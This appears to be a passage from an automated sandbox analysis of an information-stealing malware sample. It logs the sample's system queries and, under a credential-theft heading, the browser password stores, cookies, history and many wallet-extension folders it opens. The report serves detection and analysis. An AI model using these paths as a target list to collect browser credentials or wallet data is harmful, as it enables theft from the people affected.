      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
